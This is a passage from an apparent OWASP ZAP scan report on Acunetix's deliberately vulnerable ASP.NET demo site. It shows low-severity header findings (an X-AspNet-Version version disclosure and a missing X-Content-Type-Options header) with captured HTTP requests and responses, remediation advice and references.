gY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	32
Solution	Configure the server so it will not return those headers.
Reference	https://www.troyhunt.com/shhh-dont-let-your-response-headers/ https://blogs.msdn.microsoft.com/varunm/2013/04/23/remove-unwanted-http-response-headers/
Tags	WSTG-v42-INFO-08 OWASP_2021_A05 OWASP_2017_A06
CWE Id	933
WASC Id	14
Plugin Id	10061

Low	X-Content-Type-Options Header Missing
Description	The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
